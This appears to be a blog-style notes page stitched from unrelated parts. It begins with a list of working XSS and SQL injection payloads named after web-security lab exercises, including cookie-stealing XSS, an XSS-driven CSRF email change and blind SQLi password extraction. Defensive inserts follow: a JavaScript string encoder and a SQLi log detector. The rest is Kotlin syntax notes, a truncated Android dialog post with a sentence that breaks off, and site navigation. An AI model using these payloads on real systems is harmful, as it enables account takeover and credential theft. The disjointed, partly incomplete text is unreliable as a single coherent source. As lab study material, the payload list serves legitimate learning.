Reflected DOM XSS - quotes escaped, backslash not
    \"-alert(1)}//

Reflected XSS into HTML context with no encoding
    <script>alert(1)</script>

Reflected XSS into HTML context with most tags and attributes blocked
    <iframe src="https://vulnerable-site.com/?param=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'>

Reflected XSS into HTML context with all tags blocked except custom ones using onfocus
    <script>location = 'https://vulnerable-site.com/?param=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';</script>

Reflected XSS with event handlers and href attributes blocked
    https://vulnerable-site.com/?param=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20here%3C%2Ftext%3E%3C%2Fa%3E

Reflected XSS with some SVG markup allowed using onbegin
    https://vulnerable-site.com/?param=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

Reflected XSS into attribute with angle brackets HTML-encoded
    "onmouseover="alert(1)

Stored XSS into HTML context with nothing encoded
    <script>alert(1)</script>

Stored XSS into anchor href attribute with double quotes HTML-encoded
    javascript:alert(1)

Reflected XSS in canonical link tag using OS access keys
    https://vulnerable-site.com/?%27accesskey=%27x%27onclick=%27alert(1)

Reflected XSS into a JavaScript string with single quote and backslash escaped
    </script><script>alert(1)</script>

Reflected XSS into a JavaScript string with angle brackets HTML encoded
    '-alert(1)-'

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
    test'payload
    test\payload
    \'-alert(1)//

Reflected XSS in a JavaScript URL with some characters blocked
    https://vulnerable-site.com/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27

Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
    http://foo?'-alert(1)-'

Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped
    ${alert(1)}

Reflected XSS with AngularJS sandbox escape without strings
    https://vulnerable-site.com/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

Reflected XSS with AngularJS sandbox escape and CSP
    <script>location='https://vulnerable-site.com/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';</script>

DOM XSS in document.write sink using source location.search
    "><svg onload=alert(1)>

DOM XSS in document.write sink using source location.search inside a select element
    param?paramId=1&storeId="></select><img%20src=1%20onerror=alert(1)>

DOM XSS in innerHTML sink using source location.search
    <img src=1 onerror=alert(1)>

DOM XSS in jQuery anchor href attribute sink using location.search source
    javascript:alert(document.cookie)

DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
    {{$on.constructor('alert(1)')()}}

Stored DOM XSS
    <><img src=1 onerror=alert(1)>

Exploiting XSS to perform CSRF
    <script>
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get', '/site-endpoint', true);
    req.send();
    function handleResponse() {
        var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
        var changeReq = new XMLHttpRequest();
        changeReq.open('post', '/site-endpoint/request', true);
        changeReq.send('csrf=' + token + '&[email protected]');
    }
    </script>

Reflected XSS protected by CSP, with CSP bypass
    https://vulnerable-site.com/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
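Two of the JavaScript-string labs above (quotes escaped but the backslash not, and the </script> breakout) come down to the same defensive mistake: escaping at the wrong layer. The following is an added example, not from the original notes, that puts the weak quote-only escaper beside a context-aware encoder; the function names and the lexer-style breakout check are this example's own, while the two payloads are the ones listed above.

```javascript
// Added example (not from the original notes): why escaping only the quote characters
// fails to protect a JavaScript string context, and a context-aware encoder that holds.
// Payload strings below are the ones catalogued above; everything else is this example's own.

// The weak sanitiser the "quotes escaped, backslash not" lab defeats: quotes get a
// backslash, but an attacker-supplied backslash is left alone and can consume that
// added backslash, so the quote that follows it is live again.
function escapeQuotesOnly(value) {
  return String(value).replace(/"/g, '\\"').replace(/'/g, "\\'");
}

// Hardened encoder for a JavaScript string literal: everything outside a small
// allow-list becomes a \xHH or \uHHHH escape. That neutralises backslashes and quotes
// as well as the "<" and "/" that would otherwise let "</script>" end the script block
// at the HTML parser level, which no amount of JavaScript-level quote escaping prevents.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Render the untrusted value into an inline script the way a vulnerable template does.
function renderInlineScript(value, encoder) {
  return '<script>var search = "' + encoder(value) + '";</script>';
}

// Reviewer's check on the encoded output: walk it the way the JavaScript lexer walks a
// double-quoted literal (a backslash escapes exactly one following character, a bare
// quote ends the literal) and also look for a literal "</script" that would break out
// one layer up, in the HTML parser.
function breaksOutOfString(encoded) {
  for (let i = 0; i < encoded.length; i++) {
    if (encoded[i] === '\\') { i++; continue; }
    if (encoded[i] === '"') return true;
  }
  return /<\/script/i.test(encoded);
}

// Two payloads from the notes above, exercised against both encoders.
const PAYLOADS = ['\\"-alert(1)}//', '</script><script>alert(1)</script>'];
for (const p of PAYLOADS) {
  console.log(JSON.stringify(p),
    'quotes-only breakout:', breaksOutOfString(escapeQuotesOnly(p)),
    'encoder breakout:', breaksOutOfString(encodeForJsString(p)));
}
```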
SQL injection UNION attack, determining the number of columns returned by the query
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses

SQL injection UNION attack, finding a column containing text
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses (# of columns)
    '+UNION+SELECT+'abcdef',NULL,NULL--
    -- Try a string value in each NULL position, noting unique responses

SQL injection UNION attack, retrieving data from other tables
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses (# of columns)
    '+UNION+SELECT+'abcdef',NULL,NULL--
    -- Try a string value in each NULL position, noting unique responses
    '+UNION+SELECT+'abc','def'--
    -- Ex: 2 columns containing text
    '+UNION+SELECT+col_name1,+col_name2+FROM+table_name--
    -- Retrieve contents from the table

SQL injection UNION attack, retrieving multiple values in a single column
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses (# of columns)
    '+UNION+SELECT+'abcdef',NULL,NULL--
    -- Try a string value in each NULL position, noting unique responses
    -- Retrieving contents of table_name, where col_name1 & col_name2 are columns:
    '+UNION+SELECT+NULL,col_name1||'~'||col_name2+FROM+table_name--

SQL injection attack, querying the database type and version on Oracle
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses (# of columns)
    '+UNION+SELECT+'abcdef',NULL,NULL--
    -- Try a string value in each NULL position, noting unique responses
    '+UNION+SELECT+'abc','def'+FROM+DUAL--
    -- Ex: 2 columns w/ text
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    -- Display DB version

SQL injection attack, querying the database type and version on MySQL and Microsoft
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses (# of columns)
    '+UNION+SELECT+'abcdef',NULL,NULL--
    -- Try a string value in each NULL position, noting unique responses
    '+UNION+SELECT+'abc','def'#
    -- Ex: 2 columns w/ text
    '+UNION+SELECT+@@version,+NULL#
    -- Display DB version

SQL injection attack, listing the database contents on non-Oracle databases
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses (# of columns)
    '+UNION+SELECT+'abcdef',NULL,NULL--
    -- Try a string value in each NULL position, noting unique responses
    '+UNION+SELECT+'abc','def'--
    -- Ex: 2 columns w/ text
    -- Retrieve the list of tables in the database:
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

SQL injection attack, listing the database contents on Oracle
    '+UNION+SELECT+NULL--
    -- Keep adding more NULL values, noting unique responses (# of columns)
    '+UNION+SELECT+'abcdef',NULL,NULL--
    -- Try a string value in each NULL position, noting unique responses
    '+UNION+SELECT+'abc','def'+FROM+DUAL--
    -- Ex: 2 columns w/ text
    -- Retrieve the list of tables in the database:
    '+UNION+SELECT+table_name,NULL+FROM+all_tables--
    -- Retrieve the details of the columns in the table:
    '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
    -- Retrieving particular columns in a table:
    '+UNION+SELECT+COL_NAME1,+COL_NAME2+FROM+TABLE_NAME--

Blind SQL injection with conditional responses
    -- Tracking cookie, e.g. TrackingId=xyz. Testing boolean conditions to observe the response.
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    -- Test for existence of a particular table - 'table_name'
    TrackingId=xyz' AND (SELECT 'a' FROM table_name LIMIT 1)='a
    -- Test for existence of a particular user - 'user_name'
    TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name')='a
    -- Determine the # of chars in the password of user_name above. If true, char length > 1
    TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>1)='a
    -- Follow-up tests for password length, incrementing 'n'
    TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>n)='a
    -- Extract a single character from the password and test it against a specific value. Increment 'n' each cycle.
    TrackingId=xyz' AND (SELECT SUBSTRING(password,n,1) FROM table_name WHERE col_name='user_name')='a

Blind SQL injection with conditional errors
    -- Assume a tracking cookie; modify its value and check the response
    TrackingId=xyz'
    TrackingId=xyz''
    -- Confirm that the server is interpreting the injection as a SQL query - valid/invalid?
    TrackingId=xyz'||(SELECT '')||'
    -- Oracle database?
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    -- Submit an invalid query while still preserving valid SQL syntax: if an error is returned, the injection is being processed as a SQL query by the back end
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    -- Verify existence of a particular table - 'table_name'. If no error, it likely exists.
    TrackingId=xyz'||(SELECT '' FROM table_name WHERE ROWNUM = 1)||'
    -- Check for an error message, triggering errors conditionally on the truth of a condition (1=1) or (1=2)
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    -- Check for existence of a particular username - 'user_name'. If an error arises, it likely exists.
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
    -- Determine the # of chars in the password of the user_name discovered above
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
    -- Test password lengths, incrementing the length until the error disappears
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'
    -- Increment 'n' to extract a single character from the password and test it against a specific value
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,n,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||'

Blind SQL injection with time delays
    -- Tracking cookie, SQLi
    TrackingId=x'||pg_sleep(10)--

Blind SQL injection with time delays and information retrieval
    -- App with tracking cookie, testing for a time delay
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    -- Testing for a particular table and column
    TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
    -- Determining the # of chars in the password for the row where col_name='insert_name'
    TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
    -- Increment 'n' to test different password lengths. The correct length is found once there is no time delay.
    TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>n)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--
    -- Test a match for each password char. Start 'n' at 1 and increment up to the password length determined above.
    TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+substring(password,n,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name--

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
    '+OR+1=1--

SQL injection vulnerability allowing login bypass
    administrator'--
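On the defensive side, the probes listed above have recognisable shapes in request logs. This added example (not from the original notes) runs a small rule set over constructed log lines modelled on those probes; the log format, the sample lines and the rule names are this example's own assumptions.

```javascript
// Added example, not part of the original notes: a log detector for the injection shapes
// catalogued above (UNION probing, boolean conditions, conditional errors, time delays,
// schema enumeration, character-by-character password extraction). The log format, the
// sample lines and the rule names are this example's own constructions.

const RULES = [
  { name: 'union-probe',           re: /\bunion\s+(all\s+)?select\b/i },
  { name: 'boolean-condition',     re: /'\s*(and|or)\s+'?\d+'?\s*=\s*'?\d+/i },
  { name: 'conditional-error',     re: /\bcase\s+when\b.*?\b1\s*\/\s*0\b/i },
  { name: 'time-delay',            re: /\bpg_sleep\s*\(/i },
  { name: 'schema-enumeration',    re: /\binformation_schema\.(tables|columns)\b|\ball_tab(les|_columns)\b|\bv\$version\b|@@version/i },
  { name: 'credential-extraction', re: /\b(substring|substr|length)\s*\(\s*password\b/i },
];

// URL-decode the way the probes travel (+ is a space). On a malformed %-sequence fall
// back to the raw text so a deliberately broken encoding cannot hide the probe.
function decodeValue(raw) {
  const spaced = raw.replace(/\+/g, ' ');
  try { return decodeURIComponent(spaced); } catch (e) { return spaced; }
}

// Names of every rule the value triggers, in rule order; [] for a clean value.
function classifySqlInjection(value) {
  const decoded = decodeValue(value);
  return RULES.filter((r) => r.re.test(decoded)).map((r) => r.name);
}

// Split "a=1&b=2" or "a=1; b=2" into [name, value] pairs at the first '=' only, so a
// value that itself contains '=' (such as '1'='1) stays whole.
function splitPairs(text, sep) {
  return text.split(sep).map((s) => s.trim()).filter(Boolean).map((p) => {
    const i = p.indexOf('=');
    return i < 0 ? [p, ''] : [p.slice(0, i), p.slice(i + 1)];
  });
}

// Constructed log format: "<timestamp> <method> <url> cookie=<Cookie header>".
const LOG_LINE = /^(\S+) (\S+) (\S+) cookie=(.*)$/;

// Report every query parameter or cookie that triggers at least one rule.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;
    const [, ts, , url, cookies] = m;
    const query = url.includes('?') ? url.slice(url.indexOf('?') + 1) : '';
    const candidates = [
      ...splitPairs(query, '&').map(([k, v]) => ['query:' + k, v]),
      ...splitPairs(cookies, ';').map(([k, v]) => ['cookie:' + k, v]),
    ];
    for (const [where, value] of candidates) {
      const rules = classifySqlInjection(value);
      if (rules.length) findings.push({ ts, where, rules });
    }
  }
  return findings;
}

// Constructed traffic modelled on the probes listed above; the last line is benign.
const SAMPLE_LOG = [
  "2021-03-01T10:00:01Z GET /filter?category=Gifts'+UNION+SELECT+NULL,NULL-- cookie=TrackingId=abc123; session=s1",
  "2021-03-01T10:00:02Z GET /filter?category=Gifts cookie=TrackingId=xyz' AND '1'='1; session=s1",
  "2021-03-01T10:00:03Z GET / cookie=TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--; session=s2",
  "2021-03-01T10:00:04Z GET /post?postId=5 cookie=TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'; session=s3",
  '2021-03-01T10:00:05Z GET /filter?category=Pets cookie=TrackingId=qrst; session=s4',
];

for (const f of scanLog(SAMPLE_LOG)) console.log(f.ts, f.where, f.rules.join(','));
```

The cookie header is split before decoding so that an encoded `%3B` inside a value (as in the time-delay probe) is not mistaken for a cookie separator.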
== operator
    // Java
    String str1 = "Hello";
    String str2 = new String(str1);
    if (str1 == str2) {
        // str1 and str2 are two separate String references, so this branch never runs
        System.out.println("True, str1 and str2 point to the same reference");
    } else {
        System.out.println("False, str1 and str2 point to separate references"); // Output
    }
Kotlin:
    val str1 = "Hello"
    val str2 = String(str1.toCharArray())
    if (str1 == str2) {
        // this branch runs, because == is equivalent to str1.equals(str2)
        println("str1 and str2 both have the value \"Hello\"")
    } else {
        println("str1 and str2 have different values")
    }

=== operator - In Kotlin, the '===' operator is equivalent to Java's '==' operator and tests whether the references are equal.

Class constructor example:
    // Class with no body
    class Car

    // Class with parameters
    class Car(var make: String, var model: String, var year: Int, var color: String) {
        fun drive() { }
    }

Object instantiation:
    var car = Car("Tesla", "Model S", 2018, "silver")

Accessing class properties (local variables) and functions:
    // property 'make'
    println(car.make) // prints "Tesla"
    // function drive()
    car.drive()
Creating an array of objects:
    var manyCars = arrayOf(
        Car("Toyota", "Camry", 2017, "red"),
        Car("Nissan", "Rogue", 2013, "gray"),
        Car("Ford", "F-150", 2012, "black")
    )

Accessing an object array's element:
    manyCars[0].model   // "Camry"
    manyCars[2].drive() // Ford F-150 calls drive()

Class initializer blocks:
    class Car(var make: String, var model: String, var year: Int, var color: String) {
        fun drive() { }
        init {
            print("New car, $make $model pulling up")
        }
        init {
            // this runs after the above 'init'; 'init' blocks run in the order they appear in the code
        }
    }

Custom getter and setter functions:
    class Car(var make: String, var model: String, var year: Int, var color: String) {
        var mpg: Int
            // placeholder calculation: derive 'mpg' from other properties.
            // A later access of 'car.mpg' auto-calls this get()
            get() = if (year >= 2015) 30 else 20
        var verifiedYear = year
            // set() is often used to validate values/data; it is auto-called each time
            // a value is assigned, e.g. 'car.verifiedYear = 1999'
            set(value) {
                if (value != 0) {
                    // 'field' is the backing field; Kotlin uses it to avoid a setter calling itself
                    field = value
                }
            }
        fun drive() { }
    }
- If there are no explicit getter or setter declarations, the compiler creates them automatically. 'val' properties get just the getter (the value is immutable), while 'var' properties get both.

Superclasses and Subclasses
    // Superclass
    open class Car(var make: String, var model: String, var year: Int, var color: String) {
        var mpg = 0
        open val country = "unknown" // example value
        open fun drive() { }
    }

    // Subclass: passes its constructor parameters through to the superclass constructor
    class SportsCar(make: String, model: String, year: Int, color: String) : Car(make, model, year, color) {
        // use the override keyword to override superclass properties or functions
        override val country = "Germany" // example value
        override fun drive() { }
        // superclass properties declared with 'var' do not need to be overridden; they can simply be assigned
        init {
            mpg = 25
        }
    }

Abstract classes & interfaces
Abstract classes and interfaces are declared the same way in Kotlin, using the 'abstract' and 'interface' keywords.
    // abstract class
    abstract class Animal {
        abstract val species: String
        fun classify() {
            println("The animal is part of the $species species")
        }
    }

    // interface
    interface Hunt {
        fun chase() {
            println("Chase prey")
        }
    }

Kotlin does not have the keywords 'inherits' or 'implements'.
    // The class MyAnimal implements the 'Hunt' interface and inherits from the 'Animal' class
    class MyAnimal : Hunt, Animal() {
        override val species: String
            get() = "Lion"
    }

Abstract class constructor
    abstract class Animal(private val species: String) {
        fun classify() {
            println("The animal is part of the $species species")
        }
    }

Kotlin function signature:
    fun functionName(varName: varType): returnType {
        return varName
    }

Example:
    fun isLegal(age: Int): Boolean {
        return age >= 18
    }
    // or
    fun isLegal(age: Int): Boolean = age >= 18

    // multiple parameters
    fun applicant(age: Int, name: String) { }

    // function with no return value
    /** fun displayTotal(num1: Int, num2: Int): Unit { } -- declaring ': Unit' also indicates that the function returns nothing **/
    fun displayTotal(num1: Int, num2: Int) {
        val total = num1 + num2
        println(total)
    }

    // function with a return value
    fun larger(firstNum: Int, secondNum: Int): Int {
        val largerNum = if (firstNum > secondNum) firstNum else secondNum
        return largerNum
    }
    // the above larger() function can be simplified further:
    fun larger(firstNum: Int, secondNum: Int): Int = if (firstNum > secondNum) firstNum else secondNum
    // the return type can be removed and left for the compiler to infer from the 'if' expression
    fun larger(firstNum: Int, secondNum: Int) = if (firstNum > secondNum) firstNum else secondNum

Calling the function:
    val legal = isLegal(21)    // true
    val notLegal = isLegal(10) // false

Default function parameter values:
    fun displayMsg(message: String, name: String = "visitor") {
        println("Howdy $name, $message")
    }
    // function calls
    displayMsg("nice to meet you!", "Sarah")     // Output: Howdy Sarah, nice to meet you!
    displayMsg("pleasure to be of acquaintance") // Output: Howdy visitor, pleasure to be of acquaintance

Variable number of function arguments
    // Allows a non-fixed number of arguments of the declared type (argType)
    fun funName(vararg argName: argType): returnType { }

main() function
    // Java
    public class MainClass {
        public static void main(String[] args) {
            System.out.println("Hello world");
        }
    }

Kotlin:
    fun main(args: Array<String>) {
        println("Hello World")
    }

Static functions
    class NumberPicker {
        // 1 companion object allowed per class
        companion object {
            // declare the function inside a 'companion object' block to make it 'static'
            fun spinWheel() { }
        }
    }
    /** call spinWheel(). Unlike Java, there is no need to call the function on a class instance
        (e.g. NumberPicker c = new NumberPicker(); c.spinWheel();) **/
    NumberPicker.spinWheel()

Static factory function
    private class SecretClass private constructor() {
        companion object {
            fun create(): SecretClass {
                return SecretClass()
            }
        }
    }
    // instantiate a new SecretClass instance
    val sc = SecretClass.create()

kotlin.collections package (see the kotlin.collections reference site)
- Allows declarations of immutable or mutable collections
    List<Double>        // immutable List of Double objects
    MutableList<Double> // mutable List of Double objects

Arrays
    // array type inferred
    val numArray = arrayOf(1, 2, 3, 4, 5, 6, 7)
    // array type specified
    val intArray = intArrayOf(1, 3, 5, 7, 9)

joinToString()
    println(numArray.joinToString()) // show contents of 'numArray' (1, 2, 3 .. etc)
    /** Adding symbols/chars before and after the array contents.
        In the example below, parentheses enclose the array contents: (1, 2, 3, 4, ...) **/
    println(numArray.joinToString(prefix = "(", postfix = ")"))
    // specifying a separator between the array contents other than the default comma ','
    println(numArray.joinToString(prefix = "(", postfix = ")", separator = "*")) // Output: (1*2*3*4*5*6*7)

Lists, Sets, Maps
    // immutable list
    val nameList = listOf("Jen", "Joe", "Jim")
    // mutable list
    val mutableNameList = mutableListOf("Jack", "James", "Joey")
    // Set: unique contents only, so the set contains 2 and 4 only
    val numSet = setOf(2, 2, 4, 4)
    // mutable set
    val mutableNumSet = mutableSetOf(2, 2, 4, 4)
    // immutable map
    val alphabet = mapOf(1 to "a", 2 to "b", 3 to "c")
    println(alphabet) // Output: {1=a, 2=b, 3=c}
    // mutable map
    val mutableAlphabet = mutableMapOf(1 to "a", 2 to "b", 3 to "c", 4 to "d")
    println(mutableAlphabet) // Output: {1=a, 2=b, 3=c, 4=d}

if statements:
    val num = 21
    if (num < 21) {
        println("Underage drinker")
    } else {
        println("Adult")
    }
    // Output: Adult

Assigning a variable with the outcome of an 'if' statement:
    // 'age' will be assigned the string that follows the println()
    val age = if (num < 21) {
        println("Underage drinker")
        "Do not allow drinking" // if 'num' is under 21, 'age' is assigned "Do not allow drinking"
    } else {
        println("Legal drinker")
        "Allow drinking" // 'num' is 21 or over, so 'age' is assigned "Allow drinking"
    }

Using an 'if' statement as an expression
    // the corresponding else clause is mandatory when using 'if' as an expression
    // (given Int values 'a' and 'b')
    println(if (a > b) "a is greater than b" else "a is less than b")

when statements:
    val cost = 100
    when (cost) {
        0 -> println("Free admission")
        50 -> println("Half-price admission")
        in 51..99 -> println("Over 50% off admission")
        else -> println("Full-price admission") // default
    }
    // Output: Full-price admission

Assigning a variable with the outcome of a 'when' statement:
    // 'admission' will be assigned the appropriate string based on the matching 'when' condition
    val admission = when (cost) {
        0 -> "Free admission"
        50 -> "Half-price admission"
        in 51..99 -> "Over 50% off admission"
        else -> "Full-price admission"
    }

while & do-while loops:
    // while loops in Kotlin have similar syntax to Java
    var num = 0
    while (num < 10) {
        println("$num ")
        num++
    }
    do {
        println(num)
        num++
    } while (num < 20)

for loops:
    for (i in 1..20) {
        print("$i ")
    }
    // or, the above simplified to one line:
    // Output: the integer range 1-100 (e.g. 1 2 3 4 5 ..., includes 100)
    for (i in 1..100) print("$i ")
    // Output: same as above, but excludes the end number 100
    for (i in 1 until 100) print("$i ")
    for (chars in "Kotlin language") {
        print("$chars ")
    }
    // Output: each character of the string with a space between them (e.g. K o t l i n   l a n g ...)

Using the downTo operator in the 'for' condition reverses the range:
    for (i in 100 downTo 1) {
        print("$i ")
    }
    // Output: 100 counting down by 1 (e.g. 100 99 98 97 ...)

Using the downTo operator + step:
    for (i in 100 downTo 1 step 5) {
        print("$i ")
    }
    // Output: 100 counting down in steps of 5 (e.g. 100 95 90 85 ...)

Looping through an array:
    for (item in numArray) {
        println("$item is an item in numArray")
    }

Looping through an array using its index:
    for ((index, item) in numArray.withIndex()) {
        println("numArray[$index] has the element $item")
    }

Looping through a string to print each of its characters:
    val language = "Kotlin"
    for (c in language) {
        print(c)
    }

Data types
Integer types
Some points regarding variables and data types in Kotlin:
Kotlin variable declaration
    val greeting = "Hello World" // declaration assumed from the lines below
    greeting = "Hi again" // not allowed: 'greeting' is immutable due to the 'val' declaration

    var greeting = "Hello World"
    greeting = "Hello World, v2" // allowed: the 'var' declaration allows mutability

    var age = 21              // mutable variable (value and reference to object can change)
    var age: Int = 21         // no semicolon required at the end of a declaration statement
    val name = "John"         // 'val' for immutable variables (reference to object unchangeable)
    val name: String = "John" // equivalent to the declaration above
    val isHuman: Boolean = true

Kotlin and immutability or null safety
    val str: String = null  // not allowed
    val str: String? = null // use '?' after the data type when 'null' may be assigned
    val i: Int? = null
- Kotlin flags at compile time when a variable may be null.

Unsafe and safe operators for null in Kotlin
    // 'str' is null
    str!!.length // unsafe operator '!!': throws a NullPointerException
    str?.length  // safe operator: returns null if 'str' is null, otherwise the value of 'str.length'
    val length = str?.length ?: -1
    // '?:' is the Elvis operator: if 'str' is null, assign -1 to 'length'; otherwise 'length' gets the length of 'str'

Recently, while working on a personal app project, I became interested in custom styling for the AlertDialog boxes. Overall, I wanted the app to have a unified theme/feel and didn't want to exclude even the small detail of dialog box appearances. Perhaps I had never noticed before, but the ordering of the confirm and cancel buttons/options on the dialog boxes is a little bit odd. Researching the issue, this was apparently a complaint going back to 2012. For those wanting a little more detail, it's basically the ordering of the confirm/cancel buttons that are represented visually and programmatically as:

As indicated in the Issue Tracker link, this seems to be an intentional change for Android versions 4.0+. To be fair, I have noticed similar ordering in operating system alerts (Linux Ubuntu, perhaps) as well, so I suppose it isn't too odd.

States of connectivity on mobile devices
Getting & monitoring connectivity status
Determining server reachability
ICMP & HTTP pinging problems
HTTP Transport Libraries
Author: Exploring Android and mobile web design, security, and development.
Archives: March 2021